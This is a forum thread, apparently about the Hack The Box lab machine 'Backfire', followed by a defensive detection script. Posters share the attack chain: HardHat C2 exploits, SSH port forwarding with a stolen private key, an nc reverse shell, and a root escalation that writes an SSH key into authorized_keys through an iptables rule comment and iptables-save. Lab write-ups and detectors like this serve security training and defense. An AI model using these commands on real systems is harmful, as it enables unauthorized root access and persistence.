Posts: 14
Threads: 0
Joined: Nov 2024
(Jan 19, 2025, 01:37 PM)Steward Wrote: (Jan 19, 2025, 01:31 PM)RmF4b3VpbGxl Wrote: (Jan 19, 2025, 01:26 PM)ent0xE Wrote: (Jan 19, 2025, 01:09 PM)RmF4b3VpbGxl Wrote: (Jan 19, 2025, 10:10 AM)ent0xE Wrote: For Root from ilya:
Follow this Guide: vuln 2 and 3:
https://blog.sth.sh/hardhatc2-0-days-rce...88a6815c08
From sergej to root, follow this guide:
https://www.shielder.com/blog/2024/09/a-...scalation/
#add rule
sudo /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\nssh-ed25519 YOURSSHKEY\n'
#verify with:
sudo iptables -S
#save into authorized_keys
sudo /usr/sbin/iptables-save -f /root/.ssh/authorized_keys
#login
ssh -i key root@backfire.htb
bro i forwarded both ports but still got this error when visiting the site (Secure Connection Failed) can u show me ur port forwarding command or a solution to this problem
Posts: 43
Threads: 1
Joined: Oct 2023
(Jan 19, 2025, 01:10 PM)rootme1122 Wrote: (Jan 19, 2025, 01:03 PM)terk12 Wrote: (Jan 19, 2025, 12:45 PM)rootme1122 Wrote: (Jan 19, 2025, 12:37 PM)asdfmonster Wrote: (Jan 19, 2025, 12:26 PM)Asdjkl01 Wrote: I am having trouble keeping the shell alive long enough to enumerate the box to find the ssh keys. Is that how everyone is port forwarding? Or are they doing something else?
There are not any to find. You must add
if you have added just share because I'm tired of
ilya@10.x.x.x: Permission denied (publickey) I have added it
tell how to ?
maybe you added the pub key with a comment. you need to add just the keys without a comment.
you also can rewrite or add new sudoer file instead of adding authorized SSH key.
you can set sergej as sudoer and switch root inside the terminal
Posts: 12
Threads: 0
Joined: Dec 2024
(Jan 19, 2025, 01:37 PM)Steward Wrote: (Jan 19, 2025, 01:31 PM)RmF4b3VpbGxl Wrote: (Jan 19, 2025, 01:26 PM)ent0xE Wrote: (Jan 19, 2025, 01:09 PM)RmF4b3VpbGxl Wrote: (Jan 19, 2025, 10:10 AM)ent0xE Wrote: For Root from ilya:
Follow this Guide: vuln 2 and 3:
https://blog.sth.sh/hardhatc2-0-days-rce...88a6815c08
From sergej to root, follow this guide:
https://www.shielder.com/blog/2024/09/a-...scalation/
#add rule
sudo /usr/sbin/iptables -A INPUT -i lo -j ACCEPT -m comment --comment $'\nssh-ed25519 YOURSSHKEY\n'
#verify with:
sudo iptables -S
#save into authorized_keys
sudo /usr/sbin/iptables-save -f /root/.ssh/authorized_keys
#login
ssh -i key root@backfire.htb
Successfully exploited Vuln 2 as ilya, but can't get the vuln3 to work, could you help? I can't find where I can use the user claim from vuln 2
Make sure when you ran the exploit script from vuln 2, that the user "sth_pentest" was created, you need portfwd via SSH (5000/7096) to your box for that. When the user was created login under https://127.0.0.1:7096 (don't need the jwt token) and the endpoint where you get code execution is https://127.0.0.1:7096/ImplantInteract. Add an SSH-Key for easy access like: echo 'ssh-ed25519 SSHKEY' > /home/sergej/.ssh/authorized_keys
When executed, vuln2 created user pfapostol.
But how am I supposed to log in without password
the only password you need is the password to login C2, after that all SSH connections go using SSH keys
I got ssh access to ilya, next step I executed vuln 2 that creates the account, now I am in front of HardHat C2 login page
Posts: 14
Threads: 0
Joined: Nov 2024
I got ssh access to ilya, next step I executed vuln 2 that creates the account, now I am in front of HardHat C2 login page
how did u get access to hardhat c2 for god's sake, my port forwarding is not working
Posts: 43
Threads: 1
Joined: Oct 2023
(Jan 19, 2025, 01:42 PM)RmF4b3VpbGxl Wrote: (Jan 19, 2025, 01:37 PM)Steward Wrote: (Jan 19, 2025, 01:31 PM)RmF4b3VpbGxl Wrote: (Jan 19, 2025, 01:26 PM)ent0xE Wrote: (Jan 19, 2025, 01:09 PM)RmF4b3VpbGxl Wrote: Successfully exploited Vuln 2 as ilya, but can't get the vuln3 to work, could you help? I can't find where I can use the user claim from vuln 2
Make sure when you ran the exploit script from vuln 2, that the user "sth_pentest" was created, you need portfwd via SSH (5000/7096) to your box for that. When the user was created login under https://127.0.0.1:7096 (don't need the jwt token) and the endpoint where you get code execution is https://127.0.0.1:7096/ImplantInteract. Add an SSH-Key for easy access like: echo 'ssh-ed25519 SSHKEY' > /home/sergej/.ssh/authorized_keys
When executed, vuln2 created user pfapostol.
But how am I supposed to log in without password
the only password you need is the password to login C2, after that all SSH connections go using SSH keys
I got ssh access to ilya, next step I executed vuln 2 that creates the account, now I am in front of HardHat C2 login page
login there as this user and go to Interact then Terminal then click +
In your ilya shell start a listener
nc -nvlp 1234
and run a bash revshell in 7096 terminal
nc 127.0.0.1 1234 -e /bin/bash
and u will get shell as sergej
Posts: 12
Threads: 0
Joined: Dec 2024
(Jan 19, 2025, 01:45 PM)Steward Wrote: (Jan 19, 2025, 01:42 PM)RmF4b3VpbGxl Wrote: (Jan 19, 2025, 01:37 PM)Steward Wrote: (Jan 19, 2025, 01:31 PM)RmF4b3VpbGxl Wrote: (Jan 19, 2025, 01:26 PM)ent0xE Wrote: Make sure when you ran the exploit script from vuln 2, that the user "sth_pentest" was created, you need portfwd via SSH (5000/7096) to your box for that. When the user was created login under https://127.0.0.1:7096 (don't need the jwt token) and the endpoint where you get code execution is https://127.0.0.1:7096/ImplantInteract. Add an SSH-Key for easy access like: echo 'ssh-ed25519 SSHKEY' > /home/sergej/.ssh/authorized_keys
When executed, vuln2 created user pfapostol.
But how am I supposed to log in without password
the only password you need is the password to login C2, after that all SSH connections go using SSH keys
I got ssh access to ilya, next step I executed vuln 2 that creates the account, now I am in front of HardHat C2 login page
login there as this user and go to Interact then Terminal then click +
In your ilya shell start a listener
nc -nvlp 1234
and run a bash revshell in 7096 terminal
nc 127.0.0.1 1234 -e /bin/bash
and u will get shell as sergej
As the user created by the vuln? Or from creds we got in initial files? Furthermore, it looks like I can't type in the login form :/
Posts: 43
Threads: 1
Joined: Oct 2023
Jan 19, 2025, 01:49 PM
(This post was last modified: Jan 19, 2025, 01:52 PM by Steward.)
(Jan 19, 2025, 01:44 PM)Zer0Gr2vity Wrote: I got ssh access to ilya, next step I executed vuln 2 that creates the account, now I am in front of HardHat C2 login page
how did u get access to hardhat c2 for god's sake, my port forwarding is not working
command to port forward:
* Switch SSH shell first
ilya@backfire:~/Havoc/payloads/Demon$ cat ~/.ssh/id_rsa
on your Kali
root@kali:~/htb# chmod 600 ilya_id_rsa
port forward for port 5000 using this syntax
root@kali:~/htb# ssh -L 5000:127.0.0.1:5000 -i ilya_id_rsa ilya@10.10.11.49
and port 7096 using this:
root@kali:~/htb# ssh -L 7096:127.0.0.1:7096 -i ilya_id_rsa ilya@10.10.11.49
(Jan 19, 2025, 01:48 PM)RmF4b3VpbGxl Wrote: (Jan 19, 2025, 01:45 PM)Steward Wrote: (Jan 19, 2025, 01:42 PM)RmF4b3VpbGxl Wrote: (Jan 19, 2025, 01:37 PM)Steward Wrote: (Jan 19, 2025, 01:31 PM)RmF4b3VpbGxl Wrote: When executed, vuln2 created user pfapostol.
But how am I supposed to log in without password
the only password you need is the password to login C2, after that all SSH connections go using SSH keys
I got ssh access to ilya, next step I executed vuln 2 that creates the account, now I am in front of HardHat C2 login page
login there as this user and go to Interact then Terminal then click +
In your ilya shell start a listener
nc -nvlp 1234
and run a bash revshell in 7096 terminal
nc 127.0.0.1 1234 -e /bin/bash
and u will get shell as sergej
As the user created by the vuln? Or from creds we got in initial files? Furthermore, it looks like I can't type in the login form :/
user from exploit. you must be able to type login and pass. if not hence something wrong with browser.
after port forward you login https://127.0.0.1:7096 and will be able to type login and pass in login form.
Posts: 22
Threads: 0
Joined: Jan 2025
how to get the root shell
Posts: 14
Threads: 0
Joined: Nov 2024
(Jan 19, 2025, 02:05 PM)Aditya Wrote: how to get the root shell
https://www.shielder.com/blog/2024/09/a-...scalation/
Posts: 14
Threads: 0
Joined: Nov 2024
(Jan 19, 2025, 02:50 PM)Aditya Wrote: (Jan 19, 2025, 02:31 PM)Zer0Gr2vity Wrote: (Jan 19, 2025, 02:05 PM)Aditya Wrote: how to get the root shell
https://www.shielder.com/blog/2024/09/a-...scalation/
its giving me permission error
u shouldn't follow the same to rewrite /etc/passwd, u should write the authorized_keys in root directory to add ur pub key then connect with ur key
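A detection-side view of the rule-comment write quoted in this thread, added here as an example (not code from any poster or from the linked guides): it scans a saved ruleset or an authorized_keys file for SSH key material sitting inside iptables-save output. The sample text, the placeholder key blob, the exact dump layout and the function names are assumptions made for illustration.

```python
import re

# An OpenSSH public key at the start of a line (key type, then base64 blob).
KEY_RE = re.compile(
    r"(ssh-(ed25519|rsa|dss)|ecdsa-sha2-nistp\d+|sk-\S+)\s+[A-Za-z0-9+/=]{16,}")
# Lines only iptables-save emits: header/footer, table, chain policy, rule, COMMIT.
DUMP_RE = re.compile(
    r"# (Generated by|Completed on) |\*(filter|nat|mangle|raw|security)$"
    r"|:\S+ \S+ \[\d+:\d+\]|-A \S+ |COMMIT$")

# Constructed sample: an authorized_keys file after a ruleset holding a
# multi-line rule comment was saved over it (the key blob is a placeholder).
TAMPERED = '''\
# Generated by iptables-save v1.8.9 on Sun Jan 19 13:00:00 2025
*filter
:INPUT ACCEPT [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -m comment --comment "
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERPLACEHOLDERPLACEHOLDER
" -j ACCEPT
COMMIT
# Completed on Sun Jan 19 13:00:00 2025
'''
# Constructed sample: an ordinary authorized_keys file.
NORMAL = ("# laptop key\n"
          "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERPLACEHOLDER admin@example\n")

def scan(text):
    """Classify every non-blank line of a ruleset dump or authorized_keys file."""
    report = {"dump_lines": 0, "key_lines": [], "stray_lines": []}
    for number, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        if DUMP_RE.match(line):
            report["dump_lines"] += 1            # genuine iptables-save line
        elif KEY_RE.match(line.strip()):
            report["key_lines"].append(number)   # looks like a public key
        else:
            report["stray_lines"].append(number) # neither: comment, quote tail...
    return report

def verdict(report):
    """Ruleset syntax and key material in one file is the signal to alert on."""
    if report["dump_lines"] and report["key_lines"]:
        return "ALERT: SSH public key embedded in iptables-save output"
    if report["dump_lines"] and report["stray_lines"]:
        return "WARN: ruleset contains a field that spans several lines"
    return "ok"

if __name__ == "__main__":
    print(verdict(scan(TAMPERED)), "|", verdict(scan(NORMAL)))
```

The same check applies to live `iptables-save` output and to `/root/.ssh/authorized_keys` on hosts where an unprivileged user has sudo rights on `iptables` or `iptables-save`.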